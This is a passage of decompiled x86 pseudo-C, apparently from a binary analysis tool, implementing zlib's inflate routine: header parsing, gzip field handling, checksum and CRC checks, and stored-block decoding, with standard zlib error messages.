				while(1) {
					L0:
					_t1125 = __esi;
					_t1103 = __edi;
					_t1054 = __edx;
					_t928 = __ecx;
					_t920 = __ebx;
					if(__edi >= 0xe) {
						goto L180;
					}
					L177:
					__eax =  *(__ebp - 8);
					while(1) {
						L178:
						if(__ecx == 0) {
							break;
						}
						L179:
						__eax =  *__eax & 0x000000ff;
						 *(__ebp - 4) = __ecx;
						__ecx = __edi;
						__eax = __eax << __cl;
						__edi = __edi + 8;
						__ecx =  *(__ebp - 4);
						__edx = __edx + __eax;
						__eax =  *(__ebp - 8);
						__eax =  *(__ebp - 8) + 1;
						 *(__ebp - 0xc) = __edx;
						 *(__ebp - 8) = __eax;
						if(__edi < 0xe) {
							continue;
						}
						goto L180;
					}
					L322:
					_t935 =  *(_t1164 - 4);
					L323:
					_t712 = _t1164 + 8; // 0x38
					_t1127 =  *_t712;
					 *(_t1127 + 0xc) =  *(_t1164 - 0x1c);
					_t716 = _t1164 - 8; // 0x38
					 *(_t1127 + 0x10) =  *(_t1164 - 0x18);
					_t1060 = 0;
					 *_t1127 =  *_t716;
					 *(_t1127 + 4) = _t935;
					_t920[0xf] = _t1103;
					_t1105 =  *((intOrPtr*)(_t1164 - 0x28));
					_t920[0xe] =  *(_t1164 - 0xc);
					if(_t920[0xa] != 0) {
						L328:
						_t785 = E01322DCB(_t1127,  *(_t1127 + 0xc), _t1105 -  *(_t1127 + 0x10));
						if(_t785 == 0) {
							L331:
							_t1060 = 0;
							L332:
							_t787 =  *(_t1164 - 0x38) -  *(_t1127 + 4);
							_t1106 = _t1105 -  *(_t1127 + 0x10);
							 *((intOrPtr*)(_t1127 + 8)) =  *((intOrPtr*)(_t1127 + 8)) + _t787;
							 *((intOrPtr*)(_t1127 + 0x14)) =  *((intOrPtr*)(_t1127 + 0x14)) + _t1106;
							_t920[7] = _t920[7] + _t1106;
							 *(_t1164 - 0x38) = _t787;
							if(_t920[2] != _t1060) {
								if(_t1106 != 0) {
									_push(_t1106);
									_push( *(_t1127 + 0xc) - _t1106);
									_push(_t920[6]);
									if(_t920[4] == _t1060) {
										_t796 = E01322E91();
									} else {
										_t796 = E013230C1();
									}
									_t920[6] = _t796;
									_t1060 = 0;
									 *(_t1127 + 0x30) = _t796;
								}
							}
							if( *_t920 == 0x13) {
								L340:
								_t1060 = 0x100;
								goto L341;
							} else {
								L339:
								if( *_t920 != 0xe) {
									L341:
									 *(_t1164 + 8) = 0x80;
									asm("sbb ecx, ecx");
									_t789 =  ==  ?  *(_t1164 + 8) : 0;
									_t790 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060;
									_t791 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
									 *((intOrPtr*)(_t1127 + 0x2c)) = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
									if( *(_t1164 - 0x38) != 0) {
										L343:
										if( *((intOrPtr*)(_t1164 + 0xc)) != 4) {
											L345:
											_t792 =  *(_t1164 - 0x20);
											L138:
											return _t792;
										}
										L344:
										_t793 =  *(_t1164 - 0x20);
										_t940 = 0xfffffffb;
										_t792 =  ==  ? _t940 : _t793;
										goto L138;
									}
									L342:
									if(_t1106 == 0) {
										goto L344;
									}
									goto L343;
								}
								goto L340;
							}
						}
						L329:
						 *_t920 = 0x1e;
						L330:
						_push(0xfffffffc);
						L137:
						_pop(_t792);
						goto L138;
					}
					L324:
					if(_t1105 ==  *(_t1127 + 0x10)) {
						goto L332;
					}
					L325:
					if( *_t920 >= 0x1d) {
						goto L332;
					}
					L326:
					if( *_t920 < 0x1a) {
						goto L328;
					}
					L327:
					if( *((intOrPtr*)(_t1164 + 0xc)) == 4) {
						goto L332;
					}
					goto L328;
					L180:
					_t1103 = _t1103 - 0xe;
					_t1055 = _t1054 >> 5;
					 *(_t1164 - 0x10) = _t1103;
					_t920[0x18] = (_t1054 & 0x0000001f) + 0x101;
					_t1056 = _t1055 >> 5;
					_t920[0x19] = (_t1055 & 0x0000001f) + 1;
					_t1054 = _t1056 >> 4;
					 *(_t1164 - 0xc) = _t1054;
					_t920[0x17] = (_t1056 & 0x0000000f) + 4;
					if(_t920[0x18] > 0x11e) {
						L183:
						_t1125[6] = "too many length or distance symbols";
						L31:
						 *_t920 = 0x1d;
						while(1) {
							L135:
							_t753 =  *_t920;
							if(_t753 > 0x1e) {
								break;
							}
							L1:
							switch( *((intOrPtr*)(_t753 * 4 +  &M01322B54))) {
								case 0:
									L2:
									if(_t920[2] != 0) {
										L4:
										_push(0x10);
										_pop(_t763);
										__eflags = _t1103 - _t763;
										if(_t1103 >= _t763) {
											L8:
											__eflags = _t920[2] & 0x00000002;
											if((_t920[2] & 0x00000002) == 0) {
												L11:
												_t920[4] = _t920[4] & 0x00000000;
												_t764 = _t920[8];
												__eflags = _t764;
												if(_t764 != 0) {
													_t25 = _t764 + 0x30;
													 *_t25 =  *(_t764 + 0x30) | 0xffffffff;
													__eflags =  *_t25;
												}
												L13:
												__eflags = _t920[2] & 0x00000001;
												if((_t920[2] & 0x00000001) == 0) {
													L24:
													_t1125[6] = "incorrect header check";
													goto L17;
												}
												L14:
												_t767 = (_t1054 >> 8) + ((_t1054 & 0x000000ff) << 8);
												_push(0x1f);
												_pop(_t931);
												__eflags = _t767 % _t931;
												_t1054 =  *(_t1164 - 0xc);
												if(_t767 % _t931 != 0) {
													goto L24;
												}
												L15:
												__eflags = (_t1054 & 0x0000000f) - 8;
												if((_t1054 & 0x0000000f) == 8) {
													L18:
													_t1054 = _t1054 >> 4;
													_t1103 = _t1103 - 4;
													 *(_t1164 - 0xc) = _t1054;
													 *(_t1164 - 0x10) = _t1103;
													_t934 = (_t1054 & 0x0000000f) + 8;
													__eflags = _t920[9];
													if(_t920[9] != 0) {
														L22:
														__eflags = _t934 - _t920[9];
														if(_t934 <= _t920[9]) {
															goto L20;
														} else {
															_t1125[6] = "invalid window size";
															goto L17;
														}
													} else {
														_t920[9] = _t934;
														L20:
														_t1103 = 0;
														_t920[5] = 1 << _t934;
														_t774 = E01322E91(0, 0, 0);
														_t920[6] = _t774;
														_t1125[0xc] = _t774;
														_t1065 =  !( *(_t1164 - 0xc) >> 8) & 0x00000002 | 0x00000009;
														__eflags = _t1065;
														 *_t920 = _t1065;
														_t1054 = 0;
														goto L21;
													}
												} else {
													_t1125[6] = "unknown compression method";
													goto L17;
												}
											}
											L9:
											__eflags = _t1054 - 0x8b1f;
											if(_t1054 != 0x8b1f) {
												goto L11;
											} else {
												_t1103 = 0;
												_t920[6] = E013230C1(0, 0, 0);
												_push(0x1f);
												_pop(_t776);
												 *((char*)(_t1164 - 0x14)) = _t776;
												 *((char*)(_t1164 - 0x13)) = 0x8b;
												_t778 = E013230C1(_t920[6], _t1164 - 0x14, 2);
												_t1054 = 0;
												_t920[6] = _t778;
												 *(_t1164 - 0xc) = 0;
												 *(_t1164 - 0x10) = 0;
												 *_t920 = 1;
												goto L134;
											}
										} else {
											_t4 = _t1164 - 8; // 0x38
											_t779 =  *_t4;
											while(1) {
												L6:
												__eflags = _t928;
												if(_t928 == 0) {
													goto L322;
												}
												L7:
												 *(_t1164 - 4) = _t928 - 1;
												_t798 = ( *_t779 & 0x000000ff) << _t1103;
												_t1103 = _t1103 + 8;
												_t928 =  *(_t1164 - 4);
												_t1054 = _t1054 + _t798;
												_t7 = _t1164 - 8; // 0x38
												_t779 =  *_t7 + 1;
												 *(_t1164 - 0xc) = _t1054;
												 *(_t1164 - 8) = _t779;
												 *(_t1164 - 0x10) = _t1103;
												__eflags = _t1103 - 0x10;
												if(_t1103 < 0x10) {
													continue;
												}
												goto L8;
											}
											goto L322;
										}
									} else {
										 *_t920 = 0xc;
										goto L135;
									}
								case 1:
									L25:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L29:
										__ebx[4] = __edx;
										__eflags = __dl - 8;
										if(__dl == 8) {
											L32:
											__eflags = __edx & 0x0000e000;
											if((__edx & 0x0000e000) == 0) {
												L34:
												__ecx = __ebx[8];
												__eflags = __ecx;
												if(__ecx != 0) {
													__edx = __edx >> 8;
													__eax = __edx >> 0x00000008 & 0x00000001;
													__eflags = __eax;
													 *__ecx = __eax;
												}
												__eflags = __ebx[4] & 0x00000200;
												if((__ebx[4] & 0x00000200) != 0) {
													 *(__ebp - 0x14) = __dl;
													__eax = __ebp - 0x14;
													__eflags = __edx;
													 *(__ebp - 0x13) = __dl;
													__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
												}
												__ecx =  *(__ebp - 4);
												__eax = 0;
												__eflags = 0;
												__edx = 0;
												 *__ebx = 2;
												 *(__ebp - 0xc) = 0;
												__edi = 0;
												goto L39;
											}
											L33:
											 *(__esi + 0x18) = "unknown header flags set";
										} else {
											 *(__esi + 0x18) = "unknown compression method";
										}
										goto L31;
									} else {
										_t49 = __ebp - 8; // 0x38
										__eax =  *_t49;
										while(1) {
											L27:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L28:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __edx + __eax;
											_t52 = __ebp - 8; // 0x38
											__eax =  *_t52;
											__eax =  *_t52 + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											 *(__ebp - 0x10) = __edi;
											__eflags = __edi - 0x10;
											if(__edi < 0x10) {
												continue;
											}
											goto L29;
										}
										goto L322;
									}
								case 2:
									L39:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L43:
										__eax = __ebx[8];
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 4) = __edx;
										}
										__eflags = __ebx[4] & 0x00000200;
										if((__ebx[4] & 0x00000200) != 0) {
											__eax = __edx;
											 *(__ebp - 0x14) = __dl;
											__eax = __edx >> 8;
											 *(__ebp - 0x13) = __al;
											__edx = __edx >> 0x10;
											 *(__ebp - 0x12) = __al;
											__eax = __ebp - 0x14;
											__eflags = __edx;
											 *(__ebp - 0x11) = __dl;
											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 4);
										}
										__ecx =  *(__ebp - 4);
										__eax = 0;
										__eflags = 0;
										__edx = 0;
										 *__ebx = 3;
										 *(__ebp - 0xc) = 0;
										__edi = 0;
										goto L48;
									}
									L40:
									_t72 = __ebp - 8; // 0x38
									__eax =  *_t72;
									while(1) {
										L41:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L42:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										_t75 = __ebp - 8; // 0x38
										__eax =  *_t75;
										__eax =  *_t75 + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L43;
									}
									goto L322;
								case 3:
									L48:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L52:
										__ecx = __ebx[8];
										__eflags = __ecx;
										if(__ecx != 0) {
											__eax = __dl & 0x000000ff;
											 *(__ecx + 8) = __dl & 0x000000ff;
											__ecx = __edx;
											__eax = __ebx[8];
											__ecx = __edx >> 8;
											__eflags = __ecx;
											 *(__ebx[8] + 0xc) = __ecx;
										}
										__eflags = __ebx[4] & 0x00000200;
										if((__ebx[4] & 0x00000200) != 0) {
											 *(__ebp - 0x14) = __dl;
											__eax = __ebp - 0x14;
											__eflags = __edx;
											 *(__ebp - 0x13) = __dl;
											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
										}
										__ecx =  *(__ebp - 4);
										__eax = 0;
										__eflags = 0;
										__edx = 0;
										 *__ebx = 4;
										__edi = 0;
										 *(__ebp - 0xc) = 0;
										 *(__ebp - 0x10) = 0;
										goto L57;
									}
									L49:
									_t92 = __ebp - 8; // 0x38
									__eax =  *_t92;
									while(1) {
										L50:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L51:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										_t95 = __ebp - 8; // 0x38
										__eax =  *_t95;
										__eax =  *_t95 + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L52;
									}
									goto L322;
								case 4:
									L57:
									__eflags = __ebx[4] & 0x00000400;
									if((__ebx[4] & 0x00000400) == 0) {
										L67:
										__eax = __ebx[8];
										__eflags = __eax;
										if(__eax != 0) {
											_t136 = __eax + 0x10;
											 *_t136 =  *(__eax + 0x10) & 0x00000000;
											__eflags =  *_t136;
										}
										L69:
										 *__ebx = 5;
										goto L70;
									}
									L58:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L62:
										__eax = __ebx[8];
										__ebx[0x10] = __edx;
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x14) = __edx;
										}
										__eflags = __ebx[4] & 0x00000200;
										if((__ebx[4] & 0x00000200) != 0) {
											 *(__ebp - 0x14) = __dl;
											__eax = __ebp - 0x14;
											__eflags = __edx;
											 *(__ebp - 0x13) = __dl;
											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
										}
										__eax = 0;
										__edi = 0;
										 *(__ebp - 0xc) = 0;
										 *(__ebp - 0x10) = 0;
										goto L69;
									}
									L59:
									_t116 = __ebp - 8; // 0x38
									__eax =  *_t116;
									while(1) {
										L60:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L61:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										_t119 = __ebp - 8; // 0x38
										__eax =  *_t119;
										__eax =  *_t119 + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L62;
									}
									goto L322;
								case 5:
									L70:
									__eflags = __ebx[4] & 0x00000400;
									if((__ebx[4] & 0x00000400) == 0) {
										L83:
										__edx = 0;
										__eflags = 0;
										L84:
										__ecx =  *(__ebp - 4);
										__ebx[0x10] = __edx;
										 *__ebx = 6;
										goto L86;
									}
									L71:
									__ecx = __ebx[0x10];
									__edx =  *(__ebp - 4);
									__eflags = __ecx - __edx;
									__ecx =  >  ? __edx : __ecx;
									 *(__ebp - 0x30) = __ecx;
									__eflags = __ecx;
									if(__ecx != 0) {
										__edx = __ebx[8];
										__eflags = __edx;
										if(__edx != 0) {
											__eax =  *(__edx + 0x10);
											 *(__ebp - 0x2c) = __eax;
											__eflags = __eax;
											if(__eax != 0) {
												__eax =  *(__edx + 0x14);
												__eax =  *(__edx + 0x14) - __ebx[0x10];
												__edx =  *(__edx + 0x18);
												 *(__ebp - 0x34) = __eax;
												__eflags = __eax - __edx;
												__eax =  *(__ebp - 0x34);
												if(__eflags <= 0) {
													__edx = __ecx;
												} else {
													__edx = __edx - __eax;
												}
												_t152 = __ebp - 8; // 0x38
												__ecx =  *_t152;
												__eax = __eax +  *(__ebp - 0x2c);
												__eflags = __eax;
												__eax = memcpy(__eax,  *_t152, __edx);
												__ecx =  *(__ebp - 0x30);
												__esp = __esp + 0xc;
											}
										}
										__eflags = __ebx[4] & 0x00000200;
										if((__ebx[4] & 0x00000200) != 0) {
											_t158 = __ebp - 8; // 0x38
											__ebx[6] = E013230C1(__ebx[6],  *_t158, __ecx);
										}
										__eax =  *(__ebp - 0x30);
										 *(__ebp - 4) =  *(__ebp - 4) - __eax;
										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
										_t166 =  &(__ebx[0x10]);
										 *_t166 = __ebx[0x10] - __eax;
										__eflags =  *_t166;
									}
									__edx = 0;
									__eflags = __ebx[0x10];
									if(__ebx[0x10] != 0) {
										goto L322;
									} else {
										L82:
										goto L84;
									}
								case 6:
									L85:
									__edx = 0;
									__eflags = 0;
									L86:
									__eflags = __ebx[4] & 0x00000800;
									if((__ebx[4] & 0x00000800) == 0) {
										L100:
										__eax = __ebx[8];
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x1c) = __edx;
										}
										L102:
										__edx = 0;
										 *__ebx = 7;
										__ebx[0x10] = 0;
										goto L104;
									}
									L87:
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L322;
									}
									L88:
									__esi =  *(__ebp - 4);
									__eax = __edx;
									_t175 = __ebp - 8; // 0x38
									__edx =  *_t175;
									while(1) {
										L89:
										__ecx =  *(__eax + __edx) & 0x000000ff;
										__eax = __eax + 1;
										 *(__ebp - 0x2c) = __ecx;
										__ecx = __ebx[8];
										 *(__ebp - 0x34) = __eax;
										__eflags = __ecx;
										if(__ecx != 0) {
											__edx =  *(__ecx + 0x1c);
											__eflags =  *(__ecx + 0x1c);
											if( *(__ecx + 0x1c) != 0) {
												__edx = __ebx[0x10];
												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
													__ecx =  *(__ecx + 0x1c);
													__eax =  *(__ebp - 0x2c);
													 *(__ecx + __edx) = __al;
													_t186 =  &(__ebx[0x10]);
													 *_t186 = __ebx[0x10] + 1;
													__eflags =  *_t186;
													__eax =  *(__ebp - 0x34);
												}
											}
											_t189 = __ebp - 8; // 0x38
											__edx =  *_t189;
										}
										__eflags =  *(__ebp - 0x2c);
										if( *(__ebp - 0x2c) == 0) {
											break;
										}
										L95:
										__eflags = __eax - __esi;
										if(__eax < __esi) {
											continue;
										}
										break;
									}
									L96:
									__eflags = __ebx[4] & 0x00000200;
									_t194 = __ebp + 8; // 0x38
									__esi =  *_t194;
									if((__ebx[4] & 0x00000200) != 0) {
										__ebx[6] = __eax;
										__eax =  *(__ebp - 0x34);
									}
									__ecx =  *(__ebp - 4);
									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
									__ecx =  *(__ebp - 4) - __eax;
									__eflags =  *(__ebp - 0x2c);
									 *(__ebp - 4) = __ecx;
									if( *(__ebp - 0x2c) != 0) {
										goto L322;
									} else {
										L99:
										goto L102;
									}
								case 7:
									L103:
									__edx = 0;
									__eflags = 0;
									L104:
									__eflags = __ebx[4] & 0x00001000;
									if((__ebx[4] & 0x00001000) == 0) {
										L118:
										__eax = __ebx[8];
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x24) = __edx;
										}
										L120:
										__edx =  *(__ebp - 0xc);
										 *__ebx = 8;
										goto L121;
									}
									L105:
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L322;
									}
									L106:
									__esi =  *(__ebp - 4);
									__eax = __edx;
									_t210 = __ebp - 8; // 0x38
									__edx =  *_t210;
									while(1) {
										L107:
										__ecx =  *(__eax + __edx) & 0x000000ff;
										__eax = __eax + 1;
										 *(__ebp - 0x2c) = __ecx;
										__ecx = __ebx[8];
										 *(__ebp - 0x34) = __eax;
										__eflags = __ecx;
										if(__ecx != 0) {
											__edx =  *(__ecx + 0x24);
											__eflags =  *(__ecx + 0x24);
											if( *(__ecx + 0x24) != 0) {
												__edx = __ebx[0x10];
												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
													__ecx =  *(__ecx + 0x24);
													__eax =  *(__ebp - 0x2c);
													 *(__ecx + __edx) = __al;
													_t221 =  &(__ebx[0x10]);
													 *_t221 = __ebx[0x10] + 1;
													__eflags =  *_t221;
													__eax =  *(__ebp - 0x34);
												}
											}
											_t224 = __ebp - 8; // 0x38
											__edx =  *_t224;
										}
										__eflags =  *(__ebp - 0x2c);
										if( *(__ebp - 0x2c) == 0) {
											break;
										}
										L113:
										__eflags = __eax - __esi;
										if(__eax < __esi) {
											continue;
										}
										break;
									}
									L114:
									__eflags = __ebx[4] & 0x00000200;
									_t229 = __ebp + 8; // 0x38
									__esi =  *_t229;
									if((__ebx[4] & 0x00000200) != 0) {
										__ebx[6] = __eax;
										__eax =  *(__ebp - 0x34);
									}
									__ecx =  *(__ebp - 4);
									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
									__ecx =  *(__ebp - 4) - __eax;
									__eflags =  *(__ebp - 0x2c);
									 *(__ebp - 4) = __ecx;
									if( *(__ebp - 0x2c) != 0) {
										goto L322;
									} else {
										L117:
										goto L120;
									}
								case 8:
									L121:
									__eflags = __ebx[4] & 0x00000200;
									if((__ebx[4] & 0x00000200) == 0) {
										L129:
										__edx = 0;
										__eflags = 0;
										L130:
										__ecx = __ebx[8];
										__eflags = __ecx;
										if(__ecx != 0) {
											__ebx[4] = __ebx[4] >> 9;
											__eax = __ebx[4] >> 0x00000009 & 0x00000001;
											__eflags = __eax;
											 *(__ecx + 0x2c) = __eax;
											__eax = __ebx[8];
											 *(__ebx[8] + 0x30) = 1;
										}
										__eax = E013230C1(__edx, __edx, __edx);
										__ebx[6] = __eax;
										 *(__esi + 0x30) = __eax;
										 *__ebx = 0xb;
										goto L133;
									}
									L122:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L126:
										__eax = __ebx[6] & 0x0000ffff;
										__eflags = __edx - (__ebx[6] & 0x0000ffff);
										if(__edx == (__ebx[6] & 0x0000ffff)) {
											L128:
											__edx = 0;
											__edi = 0;
											 *(__ebp - 0xc) = 0;
											 *(__ebp - 0x10) = 0;
											goto L130;
										}
										L127:
										 *(__esi + 0x18) = "header crc mismatch";
										goto L17;
									}
									L123:
									_t244 = __ebp - 8; // 0x38
									__eax =  *_t244;
									while(1) {
										L124:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L125:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										_t247 = __ebp - 8; // 0x38
										__eax =  *_t247;
										__eax =  *_t247 + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										 *(__ebp - 0x10) = __edi;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L126;
									}
									goto L322;
								case 9:
									L139:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L143:
										__ecx = __edx;
										__edi = 0xff00;
										__ecx = __edx & 0x0000ff00;
										__edx = __edx << 0x10;
										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
										__edx = __edx >> 8;
										__eax = __edx >> 0x00000008 & 0x0000ff00;
										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
										__edx = __edx >> 0x18;
										__ecx =  *(__ebp - 4);
										__eax = __eax + __edx;
										__ebx[6] = __eax;
										 *(__esi + 0x30) = __eax;
										__eax = 0;
										__edx = 0;
										 *__ebx = 0xa;
										 *(__ebp - 0xc) = 0;
										__edi = 0;
										goto L145;
									}
									L140:
									__eax =  *(__ebp - 8);
									while(1) {
										L141:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L142:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										__eax =  *(__ebp - 8);
										__eax =  *(__ebp - 8) + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L143;
									}
									goto L322;
								case 0xa:
									L144:
									__eax = 0;
									__eflags = 0;
									L145:
									__eflags = __ebx[3] - __eax;
									if(__ebx[3] == __eax) {
										L316:
										__eax =  *(__ebp - 0x1c);
										 *(__esi + 0xc) =  *(__ebp - 0x1c);
										__eax =  *(__ebp - 0x18);
										 *(__esi + 0x10) =  *(__ebp - 0x18);
										__eax =  *(__ebp - 8);
										 *__esi =  *(__ebp - 8);
										 *(__esi + 4) = __ecx;
										__ebx[0xe] = __edx;
										__ebx[0xf] = __edi;
										_push(2);
										goto L137;
									}
									L146:
									__eax = E01322E91(__eax, __eax, __eax);
									__edx =  *(__ebp - 0xc);
									__ecx =  *(__ebp - 4);
									__ebx[6] = __eax;
									 *(__esi + 0x30) = __eax;
									 *__ebx = 0xb;
									goto L147;
								case 0xb:
									L147:
									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
									if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
										goto L322;
									}
									L148:
									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
									if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
										goto L322;
									}
									goto L149;
								case 0xc:
									L149:
									__eflags = __ebx[1];
									if(__ebx[1] == 0) {
										L151:
										__eflags = __edi - 3;
										if(__edi >= 3) {
											L155:
											__eax = __edx;
											__edx = __edx >> 1;
											__ebx[1] = __eax;
											__edx = __edx & 0x00000003;
											__eax = __edx & 0x00000003;
											__eflags = __eax;
											if(__eax == 0) {
												L163:
												 *__ebx = 0xd;
												L164:
												__edx = __edx >> 2;
												__edi = __edi - 3;
												L21:
												 *(_t1164 - 0xc) = _t1054;
												 *(_t1164 - 0x10) = _t1103;
												goto L134;
											}
											L156:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												L161:
												__eax = E01321718(__ebx);
												 *__ebx = 0x13;
												__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
												if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
													goto L164;
												}
												L162:
												__edx = __edx >> 2;
												__edi = __edi - 3;
												 *(__ebp - 0xc) = __edx;
												goto L322;
											}
											L157:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												_push(0x10);
												_pop(__eax);
												 *__ebx = __eax;
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													 *(__esi + 0x18) = "invalid block type";
													 *__ebx = 0x1d;
												}
											}
											goto L164;
										}
										L152:
										__eax =  *(__ebp - 8);
										while(1) {
											L153:
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L322;
											}
											L154:
											__eax =  *__eax & 0x000000ff;
											 *(__ebp - 4) = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx =  *(__ebp - 4);
											__edx = __edx + __eax;
											__eax =  *(__ebp - 8);
											__eax =  *(__ebp - 8) + 1;
											 *(__ebp - 0xc) = __edx;
											 *(__ebp - 8) = __eax;
											__eflags = __edi - 3;
											if(__edi < 3) {
												continue;
											}
											goto L155;
										}
										goto L322;
									}
									L150:
									__ecx = __edi;
									 *__ebx = 0x1a;
									__ecx = __edi & 0x00000007;
									__edx = __edx >> __cl;
									__edi = __edi - __ecx;
									 *(__ebp - 0xc) = __edx;
									 *(__ebp - 0x10) = __edi;
									goto L134;
								case 0xd:
									L165:
									__edi = __edi & 0x00000007;
									__edi = __edi - (__edi & 0x00000007);
									__edx = __edx >> __cl;
									 *(__ebp - 0xc) = __edx;
									 *(__ebp - 0x10) = __edi;
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L169:
										__eax = __edx;
										__ecx = __edx;
										__eax =  !__edx;
										__ecx = __edx & 0x0000ffff;
										__eax =  !__edx >> 0x10;
										__eflags = __ecx -  !__edx >> 0x10;
										if(__ecx ==  !__edx >> 0x10) {
											L171:
											__eax = 0;
											__ebx[0x10] = __ecx;
											__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
											__edx = 0;
											__ecx =  *(__ebp - 4);
											__edi = 0;
											 *(__ebp - 0xc) = 0;
											 *(__ebp - 0x10) = 0;
											 *__ebx = 0xe;
											if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
												goto L323;
											}
											goto L172;
										}
										L170:
										 *(__esi + 0x18) = "invalid stored block lengths";
										goto L17;
									}
									L166:
									__eax =  *(__ebp - 8);
									while(1) {
										L167:
										__ecx =  *(__ebp - 4);
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L323;
										}
										L168:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__edx = __edx + __eax;
										 *(__ebp - 0x10) = __edi;
										__eax =  *(__ebp - 8);
										__eax =  *(__ebp - 8) + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L169;
									}
									goto L323;
								case 0xe:
									L172:
									 *__ebx = 0xf;
									goto L173;
								case 0xf:
									L173:
									__eax = __ebx[0x10];
									__eflags = __eax;
									if(__eax == 0) {
										L176:
										 *__ebx = 0xb;
										goto L135;
									}
									L174:
									__eflags = __eax - __ecx;
									__eax =  >  ? __ecx : __eax;
									__eflags = __eax -  *(__ebp - 0x18);
									__eax =  >  ?  *(__ebp - 0x18) : __eax;
									 *(__ebp - 0x34) = __eax;
